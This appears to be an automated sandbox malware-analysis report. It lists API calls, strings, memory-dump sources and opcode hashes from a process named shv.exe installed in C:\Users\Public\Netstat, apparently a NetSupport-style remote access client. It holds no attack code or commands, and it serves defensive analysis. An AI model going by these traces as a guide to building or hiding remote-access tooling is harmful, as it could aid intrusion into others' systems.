                                                                                          • Part of subcall function 11017220: _GetRawWMIStringW@16.PCICL32(Win32_SystemEnclosure,00000001,?,?), ref: 11017282
                                                                                          • Part of subcall function 11017220: CoUninitialize.COMBASE ref: 110172E0
                                                                                        • SetEvent.KERNEL32(00000328), ref: 1101741D
                                                                                        • GetTickCount.KERNEL32 ref: 11017423
                                                                                        Strings
                                                                                        • touchkbd, systype=%d, chassis=%d, took %d ms, xrefs: 1101742D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountInitializeObjectSingleStringTickUninitializeW@16Wait$Event
                                                                                        • String ID: touchkbd, systype=%d, chassis=%d, took %d ms
                                                                                        • API String ID: 3804766296-4122679463
                                                                                        • Opcode ID: 66f2a400a49d4a3db1117531ae3dbc6183e4453ddcab9e324682772d92ed33ab
                                                                                        • Instruction ID: c54e938b4ab1921e6220328725fe5e45cb955b1045b44cf9de438437e8313787
                                                                                        • Opcode Fuzzy Hash: 66f2a400a49d4a3db1117531ae3dbc6183e4453ddcab9e324682772d92ed33ab
                                                                                        • Instruction Fuzzy Hash: 47F0A0B6E1011C6BE700DBF9AC8AE6BBB9CDB4471CB100026F910C7245E9A6BC1087A1
                                                                                        APIs
                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 6D1C4FC4
                                                                                        • K32EnumProcessModules.KERNEL32(00000FA0,?,00000000,6D1C8E0D,00000000,?,6D1C8E0D,00000000,?,00000FA0,?), ref: 6D1C4FE4
                                                                                        • SetLastError.KERNEL32(00000078,00000000,?,6D1C8E0D,00000000,?,00000FA0,?), ref: 6D1C4FED
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3996192540.000000006D1C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D1C0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3996174063.000000006D1C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996243537.000000006D209000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996265641.000000006D20A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996265641.000000006D20E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996304118.000000006D210000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_6d1c0000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressEnumErrorLastModulesProcProcess
                                                                                        • String ID: EnumProcessModules
                                                                                        • API String ID: 3858832252-3735562946
                                                                                        • Opcode ID: 51615341be1cda10aba4413851b3569203e6983c691ec2cfff2fb676c40589df
                                                                                        • Instruction ID: 7ca968e72bda715d3327ffa55de58939599f0e7350b98474a2726cf8e24da91d
                                                                                        • Opcode Fuzzy Hash: 51615341be1cda10aba4413851b3569203e6983c691ec2cfff2fb676c40589df
                                                                                        • Instruction Fuzzy Hash: 22F08272604218AFD710DF99D844F6B77A8EB48721F00C81AF959D7640C774F810CFA0
                                                                                        APIs
                                                                                        • GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 6D1C5014
                                                                                        • K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,6D1C8E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6D1C5034
                                                                                        • SetLastError.KERNEL32(00000078,00000000,?,6D1C8E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6D1C503D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3996192540.000000006D1C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D1C0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3996174063.000000006D1C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996243537.000000006D209000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996265641.000000006D20A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996265641.000000006D20E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996304118.000000006D210000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_6d1c0000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressErrorFileLastModuleNameProc
                                                                                        • String ID: GetModuleFileNameExA
                                                                                        • API String ID: 4084229558-758377266
                                                                                        • Opcode ID: c170ccfd3a14355b7e8d51a6e6811eb1601b71340f0a6af944dd3995cbe53d24
                                                                                        • Instruction ID: b46d9d02b66d7e6bb3f76570d93bf19549fa8de3dd655dca13490ae2ccc29a6a
                                                                                        • Opcode Fuzzy Hash: c170ccfd3a14355b7e8d51a6e6811eb1601b71340f0a6af944dd3995cbe53d24
                                                                                        • Instruction Fuzzy Hash: D5F05E72600218ABD720CF94E904F6777B8EB48B10F00851AF945D7240D671E810CBF1
                                                                                        APIs
                                                                                          • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                        • CreateThread.KERNEL32(00000000,00001000,Function_00137630,00000000,00000000,11138782), ref: 1113782E
                                                                                        • CloseHandle.KERNEL32(00000000,?,11138782,AutoICFConfig,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 11137835
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseCreateHandleThread__wcstoi64
                                                                                        • String ID: *AutoICFConfig$Client
                                                                                        • API String ID: 3257255551-59951473
                                                                                        • Opcode ID: dfa9394c4f67a9a88e2af19c5cad945f9de50f524f94f1ff9e5559edc0139d1c
                                                                                        • Instruction ID: 9aee7181833ba8711af7cecc10eced9f2f0784297ad8accf53734ae3fbf9e9e1
                                                                                        • Opcode Fuzzy Hash: dfa9394c4f67a9a88e2af19c5cad945f9de50f524f94f1ff9e5559edc0139d1c
                                                                                        • Instruction Fuzzy Hash: 98E0D8757A062D7AF6149AE98C86F65F6199744B26F500154FA20A50C4D6A0A440CB64
                                                                                        APIs
                                                                                        • EnterCriticalSection.KERNEL32(6D20B898,00000000,?,?,?,6D1CDA7F,?,00000000), ref: 6D1CA503
                                                                                        • InterlockedExchange.KERNEL32(?,00000000), ref: 6D1CA568
                                                                                        • Sleep.KERNEL32(00000000,?,6D1CDA7F,?,00000000), ref: 6D1CA581
                                                                                        • LeaveCriticalSection.KERNEL32(6D20B898,00000000), ref: 6D1CA5B3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3996192540.000000006D1C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D1C0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3996174063.000000006D1C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996243537.000000006D209000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996265641.000000006D20A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996265641.000000006D20E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996304118.000000006D210000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_6d1c0000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$EnterExchangeInterlockedLeaveSleep
                                                                                        • String ID:
                                                                                        • API String ID: 4212191310-0
                                                                                        • Opcode ID: b0042c772b0833819a784ecd51290f995f95ba974e6003e718d28cb1bc8fc5d2
                                                                                        • Instruction ID: 8a5c4f7d978a048b15be88b6d50d9131f9c514abc1cb0cd85a8a629c4daff5be
                                                                                        • Opcode Fuzzy Hash: b0042c772b0833819a784ecd51290f995f95ba974e6003e718d28cb1bc8fc5d2
                                                                                        • Instruction Fuzzy Hash: DF210EB29042059FEB228F19C849F7BB7B9EFB6318F05441BD85693155D3B9A840CB53
                                                                                        APIs
                                                                                        • GetCommandLineA.KERNEL32 ref: 00AB1027
                                                                                        • GetStartupInfoA.KERNEL32(?), ref: 00AB107B
                                                                                        • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,?), ref: 00AB1096
                                                                                        • ExitProcess.KERNEL32 ref: 00AB10A3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3993626943.0000000000AB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00AB0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3993579084.0000000000AB0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3993652493.0000000000AB2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_ab0000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CommandExitHandleInfoLineModuleProcessStartup
                                                                                        • String ID:
                                                                                        • API String ID: 2164999147-0
                                                                                        • Opcode ID: 75adcc70a24706b67fdf6e631d918a31ad5fb593c4f12e2849031f796d0443e4
                                                                                        • Instruction ID: c34979d4693a0fb8aaaf05df5ce84b7a34dde8de059a3d63601e06e6a1d43c1d
                                                                                        • Opcode Fuzzy Hash: 75adcc70a24706b67fdf6e631d918a31ad5fb593c4f12e2849031f796d0443e4
                                                                                        • Instruction Fuzzy Hash: DA11C4304083C85AEB31BFA489A87EABFBDAF12385FA40045ECD696147D2564CC7C7A5
                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32(1102947F,?,11143E73,?), ref: 11143C2C
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\Public\Netstat\shv.exe,00000104,?,11143E73,?), ref: 11143C49
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CurrentFileModuleNameProcess
                                                                                        • String ID: C:\Users\Public\Netstat\shv.exe
                                                                                        • API String ID: 2251294070-727063226
                                                                                        • Opcode ID: a55002870a0d4bf1cb71c4a6dc96a3b81f728eb301552921936b9ec7c45aaea3
                                                                                        • Instruction ID: b9aa28b4973dc8f7500fb142756b1fa860f28402029a3e5f5efe4e67c4e883a6
                                                                                        • Opcode Fuzzy Hash: a55002870a0d4bf1cb71c4a6dc96a3b81f728eb301552921936b9ec7c45aaea3
                                                                                        • Instruction Fuzzy Hash: F811E7747282235BE7149F76C994719F7A5AB40B5DF20403EE819C76C4DB71F845C744
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: __strdup
                                                                                        • String ID: *this==pszSrc$..\CTL32\NSMString.cpp
                                                                                        • API String ID: 838363481-1175285396
                                                                                        • Opcode ID: a5ac4ff3829c8bdfed65d0be2f6ac40a61aed290b17ea4ddc345f192aeee3708
                                                                                        • Instruction ID: a2c6fbdb01941a66b86811b43504396004731e14ba87e068c6e3ef76d86aa108
                                                                                        • Opcode Fuzzy Hash: a5ac4ff3829c8bdfed65d0be2f6ac40a61aed290b17ea4ddc345f192aeee3708
                                                                                        • Instruction Fuzzy Hash: 74F0287AE403466BC701DE2EBC04A57FBD89F856D8B05807AE89CD7205E570F4048AD1
                                                                                        APIs
                                                                                        • _malloc.LIBCMT ref: 1110F4A9
                                                                                          • Part of subcall function 11162B51: __FF_MSGBANNER.LIBCMT ref: 11162B6A
                                                                                          • Part of subcall function 11162B51: __NMSG_WRITE.LIBCMT ref: 11162B71
                                                                                          • Part of subcall function 11162B51: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162B96
                                                                                        • _memset.LIBCMT ref: 1110F4D2
                                                                                          • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                          • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                          • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                          • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocateErrorExitHeapLastMessageProcess_malloc_memsetwsprintf
                                                                                        • String ID: ..\ctl32\Refcount.cpp
                                                                                        • API String ID: 2803934178-2363596943
                                                                                        • Opcode ID: 1dad7423e7d09c371aaf82e5f4f0c79299b8a2cfda0255715acc90ffe98602aa
                                                                                        • Instruction ID: 747f5be640ff5df7f7be77ac0748be8e5b1ae2afb2ba592a3adef8646797d69b
                                                                                        • Opcode Fuzzy Hash: 1dad7423e7d09c371aaf82e5f4f0c79299b8a2cfda0255715acc90ffe98602aa
                                                                                        • Instruction Fuzzy Hash: B5E0C23AE4013933C112258A2C03FDBF69C8BD19FCF060021FE0CAA201E586B55181E6
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _calloc
                                                                                        • String ID:
                                                                                        • API String ID: 1679841372-0
                                                                                        • Opcode ID: 9cedd041eecb3df7698fbc33d80b44fc007d69f78d2f5524ab9bd2bf2492814b
                                                                                        • Instruction ID: 0024421513bb2e1abb717dbf2ce3cdefbb73aa1ee3cdb3a5feae03928f974db8
                                                                                        • Opcode Fuzzy Hash: 9cedd041eecb3df7698fbc33d80b44fc007d69f78d2f5524ab9bd2bf2492814b
                                                                                        • Instruction Fuzzy Hash: 8C519E7560020AAFDB50CF68CC81FAAB7A6FF8A704F148459F929DB280D771E901CF95
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 6D1C8FE4
                                                                                        • getsockname.WSOCK32(?,?,00000010,?,01712FA8,?), ref: 6D1C9005
                                                                                        • WSAGetLastError.WSOCK32(?,?,00000010,?,01712FA8,?), ref: 6D1C902E
                                                                                          • Part of subcall function 6D1C5840: inet_ntoa.WSOCK32(00000080,?,00000000,?,6D1C8F91,00000000,00000000,6D20B8DA,?,00000080), ref: 6D1C5852
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3996192540.000000006D1C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D1C0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3996174063.000000006D1C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996243537.000000006D209000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996265641.000000006D20A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996265641.000000006D20E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996304118.000000006D210000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_6d1c0000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorLast_memsetgetsocknameinet_ntoa
                                                                                        • String ID:
                                                                                        • API String ID: 3066294524-0
                                                                                        • Opcode ID: 422a2c29836feb6377b0ca4b1d48344e435764310a78c2b86510d9e3a053ed15
                                                                                        • Instruction ID: 3b08aa42fb6e899e27d43a262040e443f274457cef29e70428b181c483e2de66
                                                                                        • Opcode Fuzzy Hash: 422a2c29836feb6377b0ca4b1d48344e435764310a78c2b86510d9e3a053ed15
                                                                                        • Instruction Fuzzy Hash: 7F111872A04109ABCB10DFA9DC01ABFB7B8EF49614F45456EED09E7244EBB06A148B91
                                                                                        APIs
                                                                                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1111145A
                                                                                        • __wsplitpath.LIBCMT ref: 11111475
                                                                                          • Part of subcall function 11169044: __splitpath_helper.LIBCMT ref: 11169086
                                                                                        • GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 111114A9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: DirectoryInformationSystemVolume__splitpath_helper__wsplitpath
                                                                                        • String ID:
                                                                                        • API String ID: 1847508633-0
                                                                                        • Opcode ID: 7498e584b69856d4904a5e87c0faea6464729445070a8fc0c411536d822b12a4
                                                                                        • Instruction ID: 71a9510f599fa1c136cb45ff21797ad5c5790827a759e4d2b52c0b71367846c8
                                                                                        • Opcode Fuzzy Hash: 7498e584b69856d4904a5e87c0faea6464729445070a8fc0c411536d822b12a4
                                                                                        • Instruction Fuzzy Hash: 34116175A4021DABEB14DF94CD42FE9F378AB48B04F404199E7246B1C0E7B12A48CB65
                                                                                        APIs
                                                                                        • InitializeCriticalSection.KERNEL32(111F0908,461C6054,?,?,?,?,-00000001,11182078,000000FF,?,1110F7F8,00000001,?,11169683,?), ref: 1110F754
                                                                                        • EnterCriticalSection.KERNEL32(111F0908,461C6054,?,?,?,?,-00000001,11182078,000000FF,?,1110F7F8,00000001,?,11169683,?), ref: 1110F770
                                                                                        • LeaveCriticalSection.KERNEL32(111F0908,?,?,?,?,-00000001,11182078,000000FF,?,1110F7F8,00000001,?,11169683,?), ref: 1110F7B8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
